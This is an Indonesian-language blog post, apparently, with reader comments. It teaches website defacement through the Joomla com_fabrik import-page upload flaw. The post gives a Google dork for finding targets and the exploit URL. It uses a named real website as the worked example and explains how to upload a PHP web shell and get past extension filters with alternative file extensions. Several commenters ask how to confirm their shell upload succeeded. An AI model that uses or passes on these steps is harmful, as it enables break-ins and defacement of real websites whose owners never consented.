Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.Oke, langsung saja.
Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability
Google Dork :
inurl:index.php?option=com_fabrik
Kreasikan sendiri dork kalian.
Exploit:
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik
Ubah urlnya menjadi :
http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di www.target.com/media/shell.php
Selanjutnya bebas mau diapakan webnya haha.
Sebagai catatan saja, tidak semua web yang vuln epxloit ini bisa diupload shell backdoor. Kadang hanya support txt atau html saja. Tinggal kreasikan saja bypass ekstensi kalian misal diubah ke .phtml, .phpjpg, .phpfla, dll.
Oke sekian tutorial kali ini. Jika ada yang kurang jelas silahkan tinggalkan komentar.
febriansyah haq says
Nice info sobat
chiaki says
Y
Muro'i El-Barezy says
mampir lagi silaturrahim sob
chiaki says
Terimakasih kawan. . .
Brebes VS Lamongan says
mampir lagi mau membawahkan kopi hahaha
chiaki says
Thanks
Maz Imtikhan says
menarik sob…
chiaki says
Apanya ?
BlogS of Hariyanto says
hadir hadir belajar menyimak sobat 🙂
chiaki says
Thanks kawan. . .
Wahyu Dwi says
xixixi kata katanya mantep 😀 pemalas gak akan sukses …
chiaki says
Hehehe
Abed Saragih says
Tipa hari ada saja ide-ide baru ya sob tiap kali saya kesini.Luar biasa ini kreatifitasnya 🙂
chiaki says
Terimakasih. . .
Guru Pantura says
Saya jujur kurang begitu mengerti masalah begini pak, masih bingung 🙁
salam guru pantura.
chiaki says
Thanks
cik awi says
Wah dahsyat ilmunya sob..
chiaki says
Hahaha. Bisa aja sob.
Deby Putra Bahrodin says
masih tetep pake injeksi ya.. Kalo di gabungin dengan virus gimana ya, mungkin aja trojan itu di gabungin sama sality terus di injeksi ke file nya …. Nyam nyam nyam
chiaki says
Lebih suka gini. Cara klasik tp tetep banyak hasil. . . :v
budi os 19 says
Salud nih sama mas adminnya….
Selalu ada ilmu dan bahan utk di post
#laporan hadir ya sob… 🙂
chiaki says
Oke. Thanks. .
Rawins says
ampuuun
ga mudeng babar blas kalo yang beginian
haha piss
cak oni says
mantef kang #JOSS
chiaki says
aselole. :v
babol only says
saya g ngerti dengan yang beginian.. Haha.
chiaki says
Hahaha. Gk lucu.
Masnady says
waduh.. maaf sob baru sempat mampir nih. lagi sibuk di dunia nyata.. dan nyempet2in mampir di sini. hehehehe..
PT cyberASK says
ditunggu komennya ama visitnya
di
http://cyberask.blogspot.com
Anonim says
file csv tuh gimana min ?
mifta khuddin says
Aq kn berhasil upload shell nya. trz letaknya ada dimana y.?? koq di [site]/media/[shell.php ada .??
Anonim says
lagu di blognya judulnya apa y
FANDY AHMD BAYHQQI says
gue bego, jadi kagak tau
Anonim says
gimana caranya tau kalo kita udah berhasil upload shell??